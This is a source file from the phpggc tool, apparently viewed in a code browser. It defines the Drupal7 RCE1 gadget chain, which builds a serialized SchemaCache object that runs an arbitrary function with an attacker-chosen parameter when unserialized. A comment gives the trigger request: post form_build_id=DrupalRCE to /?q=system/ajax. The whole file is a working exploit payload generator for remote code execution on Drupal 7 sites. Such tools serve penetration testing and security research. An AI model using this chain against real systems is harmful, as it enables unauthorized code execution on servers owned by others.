Codebase list phpggc / a334346 gadgetchains / Drupal7 / RCE / 1 / chain.php
a334346

Tree @a334346 (Download .tar.gz)

chain.php @a334346raw · history · blame

<?php

namespace GadgetChain\Drupal7;

class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
{
    public static $version = '7.0.8 < ?';
    public static $vector = '__destruct';
    public static $author = 'Blaklis';
    public static $information = 'You will need to post form_build_id=DrupalRCE to /?q=system/ajax once the payload is unserialized';

    public function generate(array $parameters)
    {
        $function = $parameters['function'];
        $parameter = $parameters['parameter'];

        return new \SchemaCache($function,$parameter);
    }
}